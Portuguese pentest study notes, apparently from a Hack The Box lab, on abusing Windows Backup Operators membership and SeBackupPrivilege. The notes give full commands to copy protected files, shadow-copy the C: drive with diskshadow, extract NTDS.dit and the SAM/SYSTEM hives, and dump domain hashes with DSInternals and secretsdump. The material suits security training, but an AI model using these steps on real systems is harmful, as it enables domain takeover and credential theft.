Windows Built-in Groups

Backup Operators

• Após o pouso em uma máquina, podemos usar o comando whoami /groupspara exibir nossas associações de grupo atuais.

• Podemos usar esta prova de conceito para explorar a vulnerabilidade SeBackupPrivilegee copiar este arquivo. Primeiro, vamos importar as bibliotecas em uma sessão do PowerShell.

• No Windows, se um usuário tiver a permissão "Fazer backup de arquivos e diretórios", ele receberá o privilégioSE_BACKUP_NAME. Esse privilégio está desativado por padrão, mas, quando ativado, permite que o usuário acesse diretórios/arquivos que não lhe pertencem ou para os quais não tem permissão .

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

• Verificando se o privilégio SeBackupPrivilege está ativado

whoami /priv #or 
Get-SeBackupPrivilege

Habilitando o privilégio SeBackup

• Se o privilégio estiver desativado, podemos ativá-lo com Set-SeBackupPrivilege

Set-SeBackupPrivilege
Get-SeBackupPrivilege

• Se o privilégio for ativado com sucesso, esse privilégio pode ser usado para copiar qualquer arquivo protegido

Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Atacando um Controlador de Domínio - Copiando o NTDS.dit

• Este grupo também permite o login local em um controlador de domínio. O banco de dados do Active Directory NTDS.dité um alvo muito atraente, pois contém os hashes NTLM de todos os objetos de usuário e computador no domínio.

• Como o NTDS.ditarquivo está bloqueado por padrão, podemos usar o utilitário diskshadow do Windows para criar uma cópia de sombra da Cunidade e expô-la como Euma unidade.

diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS C:\htb> dir E:

Copiando NTDS.dit localmente

• Em seguida, podemos usar o Copy-FileSeBackupPrivilegecmdlet para ignorar a ACL e copiar o NTDS.dit localmente.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Fazendo backup dos hives de registro SAM e SYSTEM

• Esse privilégio também nos permite fazer backup dos hives de registro SAM e SYSTEM, dos quais podemos extrair credenciais de contas locais offline usando uma ferramenta como o Impacket.secretsdump.py

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

• Extraindo credenciais do NTDS.dit

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

• Extraindo hashes usando o SecretsDump

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

• Copiando arquivos com o Robocopy

robocopy /B E:\Windows\NTDS .\ntds ntds.dit